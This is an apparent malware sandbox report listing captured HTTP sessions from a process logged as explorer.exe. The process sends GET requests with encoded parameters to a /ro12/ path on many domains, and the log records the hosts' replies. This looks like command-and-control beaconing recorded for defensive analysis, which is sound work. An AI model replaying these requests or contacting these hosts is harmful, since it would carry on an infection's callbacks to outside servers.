                                                                                                                                    Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 56 4c 7a 4b 53 37 34 2b 38 32 34 2b 34 48 74 6d 4d 39 61 2b 66 41 6e 48 74 77 6b 50 42 67 4d 65 67 4d 65 71 6b 68 62 66 32 6b 46 6b 78 53 6b 6f 79 31 34 4c 78 43 59 37 57 46 6b 6d 57 43 5a 65 4e 6c 6e 66 70 2f 37 39 72 64 45 63 78 6e 72 2b 68 61 72 33 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 73 74 61 72 74 33 39 39 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 73 74 61 72 74 33 39 39 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 73 74 61 72 74 33 39 39 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74
                                                                                                                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_VLzKS74+824+4HtmM9a+fAnHtwkPBgMegMeqkhbf2kFkxSkoy14LxCY7WFkmWCZeNlnfp/79rdEcxnr+har3uA==><head><meta charset="utf-8"><title>start399.com&nbsp;-&nbsp;start399 Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="start399.com is your first and best source for all of the information youre looking for. From general t
                                                                                                                                    Oct 11, 2023 22:56:51.372237921 CEST206INData Raw: 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 73 74 61 72 74 33 39 39 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68
                                                                                                                                    Data Ascii: opics to more of what you would expect to find here, start399.com has it all. We hope you find what you arAECe searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.
                                                                                                                                    Oct 11, 2023 22:56:51.372294903 CEST207INData Raw: 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31
                                                                                                                                    Data Ascii: input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}butto
                                                                                                                                    Oct 11, 2023 22:56:51.372349024 CEST208INData Raw: 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61
                                                                                                                                    Data Ascii: 162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-b
                                                                                                                                    Oct 11, 2023 22:56:51.372406960 CEST210INData Raw: 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74
                                                                                                                                    Data Ascii: text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10
                                                                                                                                    Oct 11, 2023 22:56:51.372458935 CEST211INData Raw: 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f
                                                                                                                                    Data Ascii: l .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.
                                                                                                                                    Oct 11, 2023 22:56:51.372513056 CEST212INData Raw: 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63
                                                                                                                                    Data Ascii: 3;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opaci
                                                                                                                                    Oct 11, 2023 22:56:51.372566938 CEST214INData Raw: 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e
                                                                                                                                    Data Ascii: auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:47px;flex-grow:1;width:60px}.conta
                                                                                                                                    Oct 11, 2023 22:56:51.372622967 CEST215INData Raw: 20 30 20 35 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22
                                                                                                                                    Data Ascii: 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-a
                                                                                                                                    Oct 11, 2023 22:56:51.372678041 CEST216INData Raw: 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 7b 6d 61 72 67 69 6e
                                                                                                                                    Data Ascii: e,.webarchive-block__list-element-link:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}.n
                                                                                                                                    Oct 11, 2023 22:56:51.690574884 CEST218INData Raw: 37 39 72 64 45 63 78 6e 72 2b 68 61 72 33 75 41 3d 3d 22 2c 22 74 69 64 22 3a 33 31 38 30 2c 22 62 75 79 62 6f 78 22 3a 66 61 6c 73 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61 69 6d 65 72 22 3a 74 72 75 65
                                                                                                                                    Data Ascii: 79rdEcxnr+har3uA==","tid":3180,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searchboxPath":"//www.start399.com/park


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    10192.168.11.2050024208.91.197.3980C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:00:57.133284092 CEST246OUTGET /ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.ps212naming.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:00:57.410998106 CEST246INHTTP/1.1 403 Forbidden
                                                                                                                                    Date: Wed, 11 Oct 2023 21:00:57 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Content-Length: 302
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 37 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                    Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (27)</h3> ...- 102.129.145.32---></div></body></html>
                                                                                                                                    Oct 11, 2023 23:00:57.620256901 CEST247INHTTP/1.1 403 Forbidden
                                                                                                                                    Date: Wed, 11 Oct 2023 21:00:57 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Content-Length: 302
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 37 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                    Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (27)</h3> ...- 102.129.145.32---></div></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    11192.168.11.205002518.119.154.6680C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:01:17.694616079 CEST248OUTGET /ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.pwpholdings.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:01:17.927550077 CEST248INHTTP/1.1 302 Found
                                                                                                                                    content-length: 0
                                                                                                                                    date: Wed, 11 Oct 2023 21:01:17 GMT
                                                                                                                                    location: https://www.hugedomains.com/domain_profile.cfm?d=pwpholdings.com
                                                                                                                                    connection: close


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    12192.168.11.205002634.120.249.18180C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:02:00.232801914 CEST249OUTGET /ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo HTTP/1.1
                                                                                                                                    Host: www.55dy5s.top
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:02:00.549660921 CEST249INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx/1.20.2
                                                                                                                                    Date: Wed, 11 Oct 2023 21:02:00 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 5208
                                                                                                                                    Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    ETag: "65267254-1458"
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Via: 1.1 google
                                                                                                                                    Connection: close
                                                                                                                                    Oct 11, 2023 23:02:00.551999092 CEST251INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                                                                                    Oct 11, 2023 23:02:00.552156925 CEST252INData Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65
                                                                                                                                    Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                                                                                    Oct 11, 2023 23:02:00.557723045 CEST253INData Raw: 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f
                                                                                                                                    Data Ascii: "===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&
                                                                                                                                    Oct 11, 2023 23:02:00.557792902 CEST255INData Raw: 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41
                                                                                                                                    Data Ascii: astChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</
                                                                                                                                    Oct 11, 2023 23:02:00.557837009 CEST255INData Raw: 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a
                                                                                                                                    Data Ascii: rc="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    13192.168.11.2050027104.247.82.9480C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:02:19.557969093 CEST256OUTGET /ro12/?pR-=TUQv1xq+sor4G/cf0NME9zAsbR56SjOR/AikpQZ6liEkkl3DXF9T0sERNIDZexcZDDH8&3fY=-ZkX HTTP/1.1
                                                                                                                                    Host: www.senior-living-91799.bond
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:02:19.800935984 CEST256INHTTP/1.1 403 Forbidden
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Wed, 11 Oct 2023 21:02:19 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 146
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                    Oct 11, 2023 23:02:20.008392096 CEST257INHTTP/1.1 403 Forbidden
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Wed, 11 Oct 2023 21:02:19 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 146
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    14192.168.11.205002852.20.84.6280C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:02:39.898715019 CEST257OUTGET /ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/ HTTP/1.1
                                                                                                                                    Host: www.riderarea.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:02:40.132421970 CEST258INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: openresty
                                                                                                                                    Date: Wed, 11 Oct 2023 21:02:40 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 142
                                                                                                                                    Connection: close
                                                                                                                                    Location: https://domains.squadhelp.com/lpd/name/www.riderarea.com
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    15192.168.11.2050029158.247.235.8980C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:03:21.518776894 CEST259OUTGET /ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y+/COmLQxuu8r1C37UwGV HTTP/1.1
                                                                                                                                    Host: www.ktrandnews.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:03:21.828180075 CEST259INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Wed, 11 Oct 2023 21:03:21 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 162
                                                                                                                                    Connection: close
                                                                                                                                    Location: https://www.ktrandnews.com/ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y+/COmLQxuu8r1C37UwGV
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    2192.168.11.2050016104.18.233.4280C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 22:57:11.130716085 CEST229OUTGET /ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.niaeoer.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 22:57:11.300649881 CEST229INHTTP/1.1 409 Conflict
                                                                                                                                    Date: Wed, 11 Oct 2023 20:57:11 GMT
                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                    Content-Length: 16
                                                                                                                                    Connection: close
                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 814a03951bd008aa-LAX
                                                                                                                                    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                                                                                                    Data Ascii: error code: 1001


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    3192.168.11.20500173.64.163.5080C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
